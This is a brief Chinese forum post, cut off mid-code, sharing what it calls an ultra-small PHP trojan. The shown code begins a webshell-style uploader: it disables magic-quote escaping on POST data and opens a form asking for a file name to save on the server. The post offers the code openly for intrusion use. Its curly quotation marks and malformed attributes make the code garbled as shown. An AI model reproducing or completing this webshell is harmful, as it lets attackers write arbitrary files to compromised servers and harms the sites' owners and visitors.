作者: spider 我也来个超小PHP小马 复制代码 代码如下: <?php header(“content-Type: text/html; charset=gb2312”); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method=”POST”> 保存文件名: <input type=”text” name=”file” size=”60′′ value=”<? echo str_replace(‘\\’,’/’